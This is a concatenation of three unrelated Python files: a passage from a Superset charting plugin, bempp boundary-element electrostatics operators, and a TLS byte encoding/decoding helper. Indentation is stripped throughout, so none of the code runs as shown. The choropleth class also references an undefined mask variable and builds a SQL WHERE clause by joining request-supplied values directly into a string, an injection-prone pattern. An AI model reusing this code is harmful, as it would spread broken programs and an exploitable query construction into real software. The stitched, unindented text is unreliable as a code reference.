#controlSetRows.append(["rate_of_change_switch"])
#controlSetRows.append(["year_group"])
#controlSetRows.append(["level_group"])
#controlSetRows.append(["sex_group"])
#controlSetRows.append(["unit_group"])
##controlSetRows.append(["show_brush", "show_legend"])
##controlSetRows.append( ["rich_tooltip"])
##controlSetRows.append(["show_markers", "x_axis_showminmax"])
##controlSetRows.append(["line_interpolation", "contribution"])
#section = {
# 'label': 'section 2',
# 'description': 'descrition 2',
# 'controlSetRows': controlSetRows,
#}
#controlSections.append(section)
##controlSetRows = []
##controlSetRows.append(["rolling_type", "rolling_periods"])
##controlSetRows.append(["time_compare"])
##controlSetRows.append(["num_period_compare", "period_ratio_type"])
##controlSetRows.append(["resample_how", "resample_rule"])
##controlSetRows.append(["resample_fillmethod"])
##section = {
## 'label': 'section 3',
## 'description': 'descrition 3',
## 'controlSetRows': controlSetRows,
##}
##controlSections.append(section)
#form_data['search_dependencies_controlSections'] = controlSections
##print('form_data')
##print(form_data)
#end of
d = {
'granularity': granularity,
'from_dttm': from_dttm,
'to_dttm': to_dttm,
'is_timeseries': self.is_timeseries,
'groupby': groupby,
'metrics': metrics,
'row_limit': row_limit,
'filter': filters,
'timeseries_limit': limit,
'extras': extras,
'timeseries_limit_metric': timeseries_limit_metric,
'form_data': form_data,
}
#print(d)
return d
class SimpleflowTsMultiChartViz(SimpleFlowTsViz):
"""A multichart """
viz_type = "simpleflow_multichart"
sort_series = False
verbose_name = _("MultiChart")
#is_timeseries = True
is_timeseries = False
# overite parent query_obj
def query_obj(self):
"""Building a query object"""
form_data = self.form_data
groupby = form_data.get("groupby") or []
#groupby = []
metrics = form_data.get("metrics") or []
# extra_filters are temporary/contextual filters that are external
# to the slice definition. We use those for dynamic interactive
# filters like the ones emitted by the "Filter Box" visualization
extra_filters = self.get_extra_filters()
granularity = (
form_data.get("granularity") or form_data.get("granularity_sqla")
)
limit = int(form_data.get("limit") or 0)
#timeseries_limit_metric = form_data.get("timeseries_limit_metric")
row_limit = int(
form_data.get("row_limit") or config.get("ROW_LIMIT"))
## __form and __to are special extra_filters that target time
## boundaries. The rest of extra_filters are simple
## [column_name in list_of_values]. `__` prefix is there to avoid
## potential conflicts with column that would be named `from` or `to`
since = (
extra_filters.get('__from') or
form_data.get("since") or
config.get("SUPERSET_DEFAULT_SINCE", "1 year ago")
)
from_dttm = utils.parse_human_datetime(since)
now = datetime.now()
if from_dttm > now:
from_dttm = now - (from_dttm - now)
until = extra_filters.get('__to') or form_data.get("until", "now")
to_dttm = utils.parse_human_datetime(until)
if from_dttm > to_dttm:
raise Exception("From date cannot be larger than to date")
## extras are used to query elements specific to a datasource type
## for instance the extra where clause that applies only to Tables
extras = {
#'where': form_data.get("where", ''),
'having': form_data.get("having", ''),
'having_druid': form_data.get('having_filters') \
if 'having_filters' in form_data else [],
'time_grain_sqla': form_data.get("time_grain_sqla", ''),
'druid_time_origin': form_data.get("druid_time_origin", ''),
}
filters = form_data['filters'] if 'filters' in form_data \
else []
for col, vals in self.get_extra_filters().items():
if not (col and vals) or col.startswith('__'):
continue
elif col in self.datasource.filterable_column_names:
# Quote values with comma to avoid conflict
filters += [{
'col': col,
'op': 'in',
'val': vals,
}]
d = {
'granularity': granularity,
'from_dttm': from_dttm,
'to_dttm': to_dttm,
'is_timeseries': self.is_timeseries,
'groupby': groupby,
'metrics': metrics,
'row_limit': row_limit,
'filter': filters,
#'timeseries_limit': limit,
'extras': extras,
#'timeseries_limit_metric': timeseries_limit_metric,
'form_data': form_data,
}
#print('NVD3MultiChartViz query_obj')
#print(d)
return d
def to_series(self, df, classed='', title_suffix=''):
# todo change to format to sequence rather than column-name:
# column-0 is x
# column-1 is y
# column-2 is type-id
# column-4 is yAxis
# column-3 is name-id
# for this setting, df.columns[2] is 'avg__plot_name_id'
# gb = df.groupby('avg__plot_name_id', sort=True)
#print('NVD3MultiChartViz to_series --df, columns')
#print(df)
#print(df.columns)
#gb = df.groupby(df.columns[1])
gb = df.groupby('plot_name_id')
chart_data = []
for name, group in gb:
#print('--group')
#print(name)
#print(group)
values = []
plot_type_id = ''
# index is column-0 which is x
for index, row in group.iterrows():
#print('--index')
#print(index)
if ( plot_type_id == '' ):
#plot_type_id = row[df.columns[2]]
plot_type_id = row['plot_type_id']
size = 1
height = 1
std = 0
#for backward support
if 'avg__x_std' in row:
size = row['avg__x_std']
if 'avg__y_std' in row:
height = row['avg__y_std']
#new format for diff
if 'avg__x_diff' in row:
size = row['avg__x_diff']
if 'avg__y_diff' in row:
height = row['avg__y_diff']
if 'avg__std' in row:
std = row['avg__std']
v = {
"x": row['__timestamp'],
"y":row['avg__y'],
"size": size,
"height": height,
#"shape":"cross",
"shape":"dpoint",
"std": std,
}
#print('shape dataset')
#print(v)
values.append(v)
#print('--value')
#print(values)
plot_type = 'line'
if ( plot_type_id == 1 ):
plot_type = 'scatter'
elif ( plot_type_id == 2 ):
plot_type = 'line'
elif ( plot_type_id == 3 ):
plot_type = 'area'
elif ( plot_type_id == 4 ):
plot_type = 'bar'
else:
plot_type = 'scatter'
d = {
"key": name,
"classed": classed,
"values": values,
#added for multichart,
"yAxis": 1,
"type": plot_type,
}
chart_data.append(d)
return chart_data
def get_data(self, df):
#print('NVD3MultiChartViz get_data df, form_data')
fd = self.form_data
#print(df)
chart_data = self.to_series(df)
time_compare = fd.get('time_compare')
if time_compare:
query_object = self.query_obj()
delta = utils.parse_human_timedelta(time_compare)
query_object['inner_from_dttm'] = query_object['from_dttm']
query_object['inner_to_dttm'] = query_object['to_dttm']
query_object['from_dttm'] -= delta
query_object['to_dttm'] -= delta
df2 = self.get_df(query_object)
df2[DTTM_ALIAS] += delta
df2 = df2.pivot_table(
index=DTTM_ALIAS,
columns=fd.get('groupby'),
values=fd.get('metrics'))
chart_data += self.to_series(
df2, classed='superset', title_suffix="---")
chart_data = sorted(chart_data, key=lambda x: x['key'])
return chart_data
class SimpleFlowTsBarViz(SimpleFlowTsViz):
"""A bar chart where the x axis is time"""
#viz_type = "bar"
viz_type = "simpleflow_bar"
sort_series = True
verbose_name = _("Time Series - Bar Chart")
class SimpleFlowTsCompareViz(SimpleFlowTsViz):
"""A line chart component where you can compare the % change over time"""
#viz_type = 'compare'
viz_type = 'simpleflow_compare'
verbose_name = _("Time Series - Percent Change")
class SimpleFlowTsStackedViz(SimpleFlowTsViz):
"""A rich stack area chart"""
#viz_type = "area"
viz_type = "simpleflow_area"
verbose_name = _("Time Series - Stacked")
sort_series = True
class IHMEChoroplethViz(SimpleFlowTsViz):
"""A rich stack area chart"""
viz_type = "ihme_choropleth"
verbose_name = _("Choropleth Map")
sort_series = True
# overite parent query_obj
def query_obj(self):
"""Building a query object"""
form_data = self.form_data
groupby = form_data.get("groupby") or []
metrics = form_data.get("metrics") or []
# extra_filters are temporary/contextual filters that are external
# to the slice definition. We use those for dynamic interactive
# filters like the ones emitted by the "Filter Box" visualization
extra_filters = self.get_extra_filters()
granularity = (
form_data.get("granularity") or form_data.get("granularity_sqla")
)
limit = int(form_data.get("limit") or 0)
timeseries_limit_metric = form_data.get("timeseries_limit_metric")
row_limit = int(
form_data.get("row_limit") or config.get("ROW_LIMIT"))
# __form and __to are special extra_filters that target time
# boundaries. The rest of extra_filters are simple
# [column_name in list_of_values]. `__` prefix is there to avoid
# potential conflicts with column that would be named `from` or `to`
since = (
extra_filters.get('__from') or
form_data.get("since") or
config.get("SUPERSET_DEFAULT_SINCE", "1 year ago")
)
from_dttm = utils.parse_human_datetime(since)
now = datetime.now()
if from_dttm > now:
from_dttm = now - (from_dttm - now)
until = extra_filters.get('__to') or form_data.get("until", "now")
to_dttm = utils.parse_human_datetime(until)
if from_dttm > to_dttm:
raise Exception("From date cannot be larger than to date")
## extras are used to query elements specific to a datasource type
## for instance the extra where clause that applies only to Tables
where_filter_str = ""
## built the filter for dashboard, since slice is now integrated with dashboard
dashboard_filter_array = []
try:
##mask_json = '{"model_group":"model_id","sex_group":"sex_id","age_select":"age_group_id","location":"country_code"}'
##form_data_db_mask = json.loads(mask_json)
where_filter_array = []
for attr, value in form_data.items():
#print("plugins/internal/simpleflow.py IHMEChoroplethViz looking at form_data.items() attr, value", attr, value)
## conditions getting too long, rewrite following codes
## 'not any(isinstance(sublist, list) for sublist in value)' is to check if 'value' is [[]], which also means
## there is no selected items. and no need to get all those items, if no selected item, then all will be selected.
if (form_data_db_mask.get(str(attr), None) is not None) and (value is not None) and value and not any(isinstance(sublist, list) for sublist in value) and len(value) > 0 :
where_filter = form_data_db_mask.get(str(attr)) + " in ( " + ",".join(value) + ")"
where_filter_array.append(where_filter)
## build the dashboard_filter_array
dashboard_filter_array += [{
'col': form_data_db_mask.get(str(attr)),
'op': 'in',
'val': map(int, value),
}]
if len(where_filter_array) > 0 :
where_filter_str = " and ".join(where_filter_array)
## sample format: age_group_id in ( 1,2,22) and model_id in ( 46,4,7,10,,108,28,38,94,106) and sex_id in ( 3)
print("plugins/internal/simpleflow.py IHMEChoroplethViz where_filter_str, dashboard_filter_array", dashboard_filter_array, where_filter_str)
except Exception as e:
logging.exception(e)
print("plugins/internal/simpleflow.py IHMEChoroplethViz exception form_data fields in viz.py is not iterable");
### between inheriented class, only this setting is different, may merge into one
default_form_data_json = '{"resample_fillmethod": null, "show_brush": false, "line_interpolation": "linear", "show_legend": true, "filters": [], "granularity_sqla": "year", "rolling_type": "null", "show_markers": false, "since": "100 years ago", "time_compare": null, "until": "5057", "resample_rule": null, "period_ratio_type": "growth", "metrics": ["avg__model_id", "avg__rt_mean", "avg__location_id","avg__year"], "timeseries_limit_metric": null, "resample_how": null, "slice_id": 177, "num_period_compare": "", "viz_type_superset": "table", "level_group": "1", "groupby": ["id"], "rich_tooltip": true, "limit": 5000, "datasource": "108__table", "x_axis_showminmax": true, "contribution": false, "time_grain_sqla": "Time Column"}'
default_form_data = json.loads(default_form_data_json)
#print("plugins/internal/simpleflow.py IHMEChoroplethViz form_data before update", form_data);
form_data.update(default_form_data)
#print("plugins/internal/simpleflow.py IHMEChoroplethViz form_data", form_data, default_form_data)
extras = {
#'where': form_data.get("where", ''),
'where': where_filter_str,
'having': form_data.get("having", ''),
'having_druid': form_data.get('having_filters') \
if 'having_filters' in form_data else [],
'time_grain_sqla': form_data.get("time_grain_sqla", ''),
'druid_time_origin': form_data.get("druid_time_origin", ''),
}
#print(extras)
filters = []
filters.extend(dashboard_filter_array)
print('plugins/internal/simpleflow.py ihme_choropleth query_obj filters', dashboard_filter_array, filters, form_data['filters'])
#data-set for controlSetRows
vis_container_id = form_data.get("viscontainer_group", 1)
vis_id = form_data.get("vistype_group", 1)
viz_type_form = form_data.get("viz_type",1)
search_setting = self.baseGraph.get_search_setting_graph_db(viz_type_form, vis_container_id, vis_id)
#build setting array
panel = {}
sections = []
rows = []
row = []
section_name_index = 1
row_name_index = 2
control_name_index = 3
if len(search_setting) > 0:
section_name = search_setting[0][section_name_index]
row_name = search_setting[0][row_name_index]
counter = 0
for r in search_setting:
### new rows, search_setting has to have ordered by section_name
if section_name != r[section_name_index] :
sections.append({"label": section_name,"description": section_name, "controlSetRows":rows})
section_name = r[section_name_index]
rows = []
row.append(r[control_name_index])
rows.append(row)
row = []
### append the last section
sections.append({"label": section_name,"description": section_name, "controlSetRows":rows})
form_data['search_dependencies_controlSections'] = sections
##rebuild form_data for data from graph-db
search_categories = self.baseGraph.get_search_categories_graph_db(viz_type_form, vis_container_id, vis_id)
search_categories_array = []
##clear all form_data related to setting, can be more effecient
for r in search_categories:
if r[2] != 'model_version':
form_data[r[2]] = []
for r in search_categories:
name = r[2]
#print('search_categories, r, name', r, name)
if r[2] == 'model_version':
name = 'sf_model_version'
if name not in form_data or type(form_data[name]) is not list:
form_data[name] = []
### need to cleanup the format data, otherwise may add duplicated format data
#print("plugins/internal/simpleflow.py form_data", name, form_data[name])
form_data[name].append([r[0],r[1]])
#print("plugins/internal/simpleflow.py form_data append", name, form_data[name])
a = { "ID": r[0], "NAME": r[1], "CAT": r[2] }
search_categories_array.append(a)
#attach graph data to form_data
form_data['graph_search_categories'] = search_categories_array;
d = {
'granularity': granularity,
'from_dttm': from_dttm,
'to_dttm': to_dttm,
'is_timeseries': self.is_timeseries,
'groupby': groupby,
'metrics': metrics,
'row_limit': row_limit,
'filter': filters,
'timeseries_limit': limit,
'extras': extras,
'timeseries_limit_metric': timeseries_limit_metric,
'form_data': form_data,
}
#print(d)
return d
def get_payload(self, force=False):
"""Handles caching around the json payload retrieval"""
cache_key = self.cache_key
payload = None
force = force if force else self.form_data.get('force') == 'true'
if not force and cache:
payload = cache.get(cache_key)
if payload:
stats_logger.incr('loaded_from_source')
is_cached = True
try:
cached_data = zlib.decompress(payload)
if PY3:
cached_data = cached_data.decode('utf-8')
payload = json.loads(cached_data)
except Exception as e:
logging.error("Error reading cache: " +
utils.error_msg_from_exception(e))
payload = None
logging.info("Serving from cache")
if not payload:
stats_logger.incr('loaded_from_cache')
data = None
is_cached = False
cache_timeout = self.cache_timeout
stacktrace = None
try:
df = self.get_df()
if not self.error_message:
data = self.get_data(df)
#df = None
#data = self.get_data(df)
except Exception as e:
logging.exception(e)
if not self.error_message:
self.error_message = str(e)
self.status = utils.QueryStatus.FAILED
data = None
stacktrace = traceback.format_exc()
payload = {
'cache_key': cache_key,
'cache_timeout': cache_timeout,
'data': data,
'error': self.error_message,
'form_data': self.form_data,
'query': self.query,
'status': self.status,
'stacktrace': stacktrace,
}
#print('plugins/internal/simpleflow.py IHMEChoroplethViz payload, data', payload, data);
payload['cached_dttm'] = datetime.utcnow().isoformat().split('.')[0]
logging.info("Caching for the next {} seconds".format(
cache_timeout))
data = self.json_dumps(payload)
if PY3:
data = bytes(data, 'utf-8')
if cache and self.status != utils.QueryStatus.FAILED:
try:
cache.set(
cache_key,
zlib.compress(data),
timeout=cache_timeout)
except Exception as e:
# cache.set call can fail if the backend is down or if
# the key is too large or whatever other reasons
logging.warning("Could not cache key {}".format(cache_key))
logging.exception(e)
cache.delete(cache_key)
payload['is_cached'] = is_cached
return payload
def get_data(self, df):
query_object = self.query_obj()
df = self.get_df(query_object)
df = df.fillna(0)
chart_data = self.to_series(df)
return chart_data
def to_series(self, df, classed='', title_suffix=''):
chart_data = []
for index, row in df.iterrows():
#print("IHMEChoroplethViz to_series iterrows index, row", index, row, row.to_dict(), df.columns)
d = {
"id": str(index+1),
"mean": row['avg__rt_mean']*100, # x100 to show color on map,
"year_id": int(row['avg__year']), #row['__timestamp'], #need to change to 'year'
"loc_id": str(int(row['avg__location_id']))
}
chart_data.append(d)
#print("IHMEChoroplethViz to_series columns ", dir(df.columns))
#for index, member in enumerate(df.columns.tolist()):
# print("IHMEChoroplethViz to_series columns ", index, member, df.columns[index])
###builds five columns needed for choropleth map dataset
#IHMEChoroplethViz get_data columns 0 model_name model_name
#IHMEChoroplethViz get_data columns 1 __timestamp __timestamp
#IHMEChoroplethViz get_data columns 2 avg__model_id avg__model_id
#IHMEChoroplethViz get_data columns 3 avg__rt_mean avg__rt_mean
#IHMEChoroplethViz get_data columns 4 avg__location_id avg__location_id
return chart_data
|
import numpy as np
import bempp.api
def direct(dirichl_space, neumann_space, q, x_q, ep_in, ep_out, kappa, operator_assembler):
from bempp.api.operators.boundary import sparse, laplace, modified_helmholtz
identity = sparse.identity(dirichl_space, dirichl_space, dirichl_space)
slp_in = laplace.single_layer(neumann_space, dirichl_space, dirichl_space, assembler=operator_assembler)
dlp_in = laplace.double_layer(dirichl_space, dirichl_space, dirichl_space, assembler=operator_assembler)
slp_out = modified_helmholtz.single_layer(neumann_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
dlp_out = modified_helmholtz.double_layer(dirichl_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
# Matrix Assembly
A = bempp.api.BlockedOperator(2, 2)
A[0, 0] = 0.5*identity + dlp_in
A[0, 1] = -slp_in
A[1, 0] = 0.5*identity - dlp_out
A[1, 1] = (ep_in/ep_out)*slp_out
@bempp.api.real_callable
def charges_fun(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
aux = np.sum(q/nrm)
result[0] = aux/(4*np.pi*ep_in)
@bempp.api.real_callable
def zero(x, n, domain_index, result):
result[0] = 0
rhs_1 = bempp.api.GridFunction(dirichl_space, fun=charges_fun)
rhs_2 = bempp.api.GridFunction(neumann_space, fun=zero)
return A, rhs_1, rhs_2
def juffer(dirichl_space, neumann_space, q, x_q, ep_in, ep_ex, kappa, operator_assembler):
from bempp.api.operators.boundary import sparse, laplace, modified_helmholtz
phi_id = sparse.identity(dirichl_space, dirichl_space, dirichl_space)
dph_id = sparse.identity(neumann_space, neumann_space, neumann_space)
ep = ep_ex/ep_in
dF = laplace.double_layer(dirichl_space, dirichl_space, dirichl_space, assembler=operator_assembler)
dP = modified_helmholtz.double_layer(dirichl_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
L1 = (ep*dP) - dF
F = laplace.single_layer(neumann_space, dirichl_space, dirichl_space, assembler=operator_assembler)
P = modified_helmholtz.single_layer(neumann_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
L2 = F - P
ddF = laplace.hypersingular(dirichl_space, neumann_space, neumann_space, assembler=operator_assembler)
ddP = modified_helmholtz.hypersingular(dirichl_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
L3 = ddP - ddF
dF0 = laplace.adjoint_double_layer(neumann_space, neumann_space, neumann_space, assembler=operator_assembler)
dP0 = modified_helmholtz.adjoint_double_layer(neumann_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
L4 = dF0 - ((1.0/ep)*dP0)
A = bempp.api.BlockedOperator(2, 2)
A[0, 0] = (0.5*(1.0 + ep)*phi_id) - L1
A[0, 1] = (-1.0)*L2
A[1, 0] = L3 # Cambio de signo por definicion de bempp
A[1, 1] = (0.5*(1.0 + (1.0/ep))*dph_id) - L4
@bempp.api.real_callable
def d_green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
const = -1./(4.*np.pi*ep_in)
result[:] = const*np.sum(q*np.dot(x-x_q, n)/(nrm**3))
@bempp.api.real_callable
def green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
result[:] = np.sum(q/nrm)/(4.*np.pi*ep_in)
rhs_1 = bempp.api.GridFunction(dirichl_space, fun=green_func)
rhs_2 = bempp.api.GridFunction(dirichl_space, fun=d_green_func)
return A, rhs_1, rhs_2
def laplaceMultitrace(dirichl_space, neumann_space, operator_assembler):
from bempp.api.operators.boundary import laplace
A = bempp.api.BlockedOperator(2, 2)
A[0, 0] = (-1.0)*laplace.double_layer(dirichl_space, dirichl_space, dirichl_space, assembler=operator_assembler)
A[0, 1] = laplace.single_layer(neumann_space, dirichl_space, dirichl_space, assembler=operator_assembler)
A[1, 0] = laplace.hypersingular(dirichl_space, neumann_space, neumann_space, assembler=operator_assembler)
A[1, 1] = laplace.adjoint_double_layer(neumann_space, neumann_space, neumann_space, assembler=operator_assembler)
return A
def modHelmMultitrace(dirichl_space, neumann_space, kappa, operator_assembler):
from bempp.api.operators.boundary import modified_helmholtz
A = bempp.api.BlockedOperator(2, 2)
A[0, 0] = (-1.0)*modified_helmholtz.double_layer(dirichl_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
A[0, 1] = modified_helmholtz.single_layer(neumann_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
A[1, 0] = modified_helmholtz.hypersingular(dirichl_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
A[1, 1] = modified_helmholtz.adjoint_double_layer(neumann_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
return A
def alpha_beta(dirichl_space, neumann_space, q, x_q, ep_in, ep_ex, kappa, alpha, beta, operator_assembler):
from bempp.api.operators.boundary import sparse
phi_id = sparse.identity(dirichl_space, dirichl_space, dirichl_space)
dph_id = sparse.identity(neumann_space, neumann_space, neumann_space)
ep = ep_ex/ep_in
A_in = laplaceMultitrace(dirichl_space, neumann_space, operator_assembler)
A_ex = modHelmMultitrace(dirichl_space, neumann_space, kappa, operator_assembler)
D = bempp.api.BlockedOperator(2, 2)
D[0, 0] = alpha*phi_id
D[0, 1] = 0.0*phi_id
D[1, 0] = 0.0*phi_id
D[1, 1] = beta*dph_id
E = bempp.api.BlockedOperator(2, 2)
E[0, 0] = phi_id
E[0, 1] = 0.0*phi_id
E[1, 0] = 0.0*phi_id
E[1, 1] = dph_id*(1.0/ep)
F = bempp.api.BlockedOperator(2, 2)
F[0, 0] = alpha*phi_id
F[0, 1] = 0.0*phi_id
F[1, 0] = 0.0*phi_id
F[1, 1] = dph_id*(beta/ep)
Id = bempp.api.BlockedOperator(2, 2)
Id[0, 0] = phi_id
Id[0, 1] = 0.0*phi_id
Id[1, 0] = 0.0*phi_id
Id[1, 1] = dph_id
interior_projector = ((0.5*Id)+A_in)
scaled_exterior_projector = (D*((0.5*Id)-A_ex)*E)
A = ((0.5*Id)+A_in)+(D*((0.5*Id)-A_ex)*E)-(Id+F)
@bempp.api.real_callable
def d_green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
const = -1./(4.*np.pi*ep_in)
result[:] = (-1.0)*const*np.sum(q*np.dot(x-x_q, n)/(nrm**3))
@bempp.api.real_callable
def green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
result[:] = (-1.0)*np.sum(q/nrm)/(4.*np.pi*ep_in)
rhs_1 = bempp.api.GridFunction(dirichl_space, fun=green_func)
rhs_2 = bempp.api.GridFunction(dirichl_space, fun=d_green_func)
return A, rhs_1, rhs_2, A_in, A_ex, interior_projector, scaled_exterior_projector
def alpha_beta_single_blocked_operator(dirichl_space, neumann_space, q, x_q, ep_in, ep_ex, kappa, alpha, beta, operator_assembler):
from bempp.api.operators.boundary import sparse, laplace, modified_helmholtz
dlp_in = laplace.double_layer(dirichl_space, dirichl_space, dirichl_space, assembler=operator_assembler)
slp_in = laplace.single_layer(neumann_space, dirichl_space, dirichl_space, assembler=operator_assembler)
hlp_in = laplace.hypersingular(dirichl_space, neumann_space, neumann_space, assembler=operator_assembler)
adlp_in = laplace.adjoint_double_layer(neumann_space, neumann_space, neumann_space, assembler=operator_assembler)
dlp_out = modified_helmholtz.double_layer(dirichl_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
slp_out = modified_helmholtz.single_layer(neumann_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
hlp_out = modified_helmholtz.hypersingular(dirichl_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
adlp_out = modified_helmholtz.adjoint_double_layer(neumann_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
phi_identity = sparse.identity(dirichl_space, dirichl_space, dirichl_space)
dph_identity = sparse.identity(neumann_space, neumann_space, neumann_space)
ep = ep_ex/ep_in
A = bempp.api.BlockedOperator(2, 2)
A[0, 0] = (-0.5*(1+alpha))*phi_identity + (alpha*dlp_out) - dlp_in
A[0, 1] = slp_in - ((alpha/ep)*slp_out)
A[1, 0] = hlp_in - (beta*hlp_out)
A[1, 1] = (-0.5*(1+(beta/ep)))*dph_identity + adlp_in - ((beta/ep)*adlp_out)
@bempp.api.real_callable
def d_green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
const = -1./(4.*np.pi*ep_in)
result[:] = (-1.0)*const*np.sum(q*np.dot(x-x_q, n)/(nrm**3))
@bempp.api.real_callable
def green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
result[:] = (-1.0)*np.sum(q/nrm)/(4.*np.pi*ep_in)
rhs_1 = bempp.api.GridFunction(dirichl_space, fun=green_func)
rhs_2 = bempp.api.GridFunction(dirichl_space, fun=d_green_func)
return A, rhs_1, rhs_2
|
import io
class Decode:
"""
Decode primitive values from bytes.
"""
@staticmethod
def u8(b):
assert len(b) == 1
return b[0]
@staticmethod
def u16(b):
assert len(b) == 2
return b[0] << 8 | b[1]
@staticmethod
def u24(b):
assert len(b) == 3
return b[0] << 16 | b[1] << 8 | b[2]
@staticmethod
def u32(b):
assert len(b) == 4
return b[0] << 24 | b[1] << 16 | b[2] << 8 | b[3]
class Read:
@staticmethod
def must(f, n):
"""
Read exactly n bytes from file-like object f. Raises
IOError if n bytes not available.
"""
x = f.read(n)
if x is None:
raise IOError('{0} bytes not available from file {1}'.format(n, f))
if len(x) != n:
raise IOError('short read from {0}: wanted {1} bytes, got {2}'.format(f, n, len(x)))
return x
@staticmethod
def partial(f, n):
"""
Read up to n bytes from file-like object f.
Returns the bytes, remain tuple (bytes is a bytes object,
remain is an integer). remain = n - len(bytes)
"""
x = f.read(n)
if x is None:
raise IOError('{0} bytes not available from file {1}'.format(n, f))
# return value-bytes, remain-int
return x, n - len(x)
u8 = lambda f: Decode.u8(Read.must(f, 1))
u16 = lambda f: Decode.u16(Read.must(f, 2))
u24 = lambda f: Decode.u24(Read.must(f, 3))
u32 = lambda f: Decode.u32(Read.must(f, 4))
@staticmethod
def maybe(child):
"""
Returns a file reading function, which fails softly
with a None rather than an exception.
"""
def reader(f):
try:
return child(f)
except:
return None
return reader
@staticmethod
def vec(f, lenf, itemf):
"""
Reads a vector of things from f, returning them as a list.
lenf is a function which reads a length from a file-like object.
itemf is a function which reads an arbitrary object from
a file-like object.
eg, to read a vector of shorts whose length is encoded with an octet:
Read.vec(f, Read.u8, Read.u16)
"""
o = []
# take length and read in whole body
ll = lenf(f)
body_bytes = Read.must(f, ll)
bodyf = io.BytesIO(body_bytes)
while bodyf.tell() != ll:
item = itemf(bodyf)
if item is not None:
o.append(item)
return o
class Encode:
"""
Encode assorted types to bytes/lists of bytes.
"""
@staticmethod
def u8(v):
assert v >= 0 and v <= 0xff
return [ v ]
@staticmethod
def u16(v):
assert v >= 0 and v <= 0xffff
return [ v >> 8 & 0xff, v & 0xff ]
@staticmethod
def u24(v):
assert v >= 0 and v <= 0xffffff
return [ v >> 16 & 0xff, v >> 8 & 0xff, v & 0xff ]
@staticmethod
def u32(v):
assert v >= 0 and v <= 0xffffffff
return [ v >> 24 & 0xff, v >> 16 & 0xff, v >> 8 & 0xff, v & 0xff ]
@staticmethod
def u64(v):
assert v >= 0 and v <= 0xffffffffffffffff
return Encode.u32(v >> 32) + Encode.u32(v & 0xffffffff)
@staticmethod
def item_vec(lenf, itemf, items):
"""
Encode the vector of items. Each item is encoded with itemf,
the length of the vector (in bytes, not items) is encoded with
lenf.
"""
body = []
for x in items:
body.extend(itemf(x))
return lenf(len(body)) + body
@staticmethod
def vec(lenf, items):
"""
Encode the vector of items. Each item is encoded with item.encode(),
the length of the vector (in bytes, not items) is encoded with
lenf.
"""
body = []
for x in items:
body.extend(x.encode())
return lenf(len(body)) + body
class Struct:
"""
Base class for all structures in TLS.
This knows how to encode itself into bytes, decode from bytes,
make nice stringified versions of itself, etc.
"""
def __bytes__(self):
return bytes(self.encode())
@classmethod
def decode(cls, b, *args, **kwargs):
f = io.BytesIO(b)
r = cls.read(f, *args, **kwargs)
return r
def __repr__(self):
return str(self)
def __str__(self):
o = []
for k in sorted(self.__dict__.keys()):
if k[0] == '_':
continue
o.append('{0} = {1}'.format(k, self.__dict__[k]))
return '<{0} {1}>'.format(self.__class__.__name__, ', '.join(o))
class Enum:
"""
Base class for all enumerations in TLS.
You need to set _Decode, _Encode and _ByteSize.
You also need to set class-level values for each value in
the enumeration, plus one named MAX which should be the maximum
allowed enumeration.
This knows how to read from a file
"""
@classmethod
def read(cls, f, lax_enum = False):
"""
Read a value from the file-like f.
If lax_enum is True, then this function does
not raise if the read value is unknown.
Otherwise, this function raises if the value read
is unknown.
"""
v = Read.must(f, cls._ByteSize)
v = cls._Decode(v)
if lax_enum is False:
cls.lookup(v)
return v
@classmethod
def table(cls):
"""
Returns a dict of values to names.
"""
d = {}
for k, v in cls.__dict__.items():
if not k.isidentifier() or k[0] == '_' or k == 'MAX':
continue
if v in d:
raise ValueError('{0} has more than one mapping for value {1:x} (at least {2!r} and {3!r})'.format(cls.__name__, v, d[v], k))
d[v] = k
return d
@classmethod
def lookup(cls, value):
"""
Ensures the given value is valid for this enum.
Raises if not.
"""
if value > cls.MAX:
raise ValueError('{0:x} cannot be decoded as a {1}: too large'.format(value, cls.__name__))
d = cls.table()
if value in d:
return d[value]
raise ValueError('{0:x} cannot be decoded as a {1}: unknown value'.format(value, cls.__name__))
@classmethod
def tostring(cls, value):
name = cls.lookup(value)
return '<{0} {1} ({2:x})>'.format(cls.__name__, name, value)
@classmethod
def to_json(cls, value):
try:
return [value, cls.__name__, cls.lookup(value)]
except ValueError:
return value
@classmethod
def encode(cls, value):
return cls._Encode(value)
@classmethod
def all(cls):
return [value for value, name in cls.table().items()]
class Enum8(Enum):
"""
An enum encoded in a single octet.
"""
_ByteSize = 1
_Encode = Encode.u8
_Decode = Decode.u8
MAX = 0xff
class Enum16(Enum):
"""
An enum encoded in a short.
"""
_ByteSize = 2
_Encode = Encode.u16
_Decode = Decode.u16
MAX = 0xffff
if __name__ == '__main__':
class DemoEnum(Enum8):
Pony = 1
Breakfast = 2
Jubilee = 3
Combine = 5
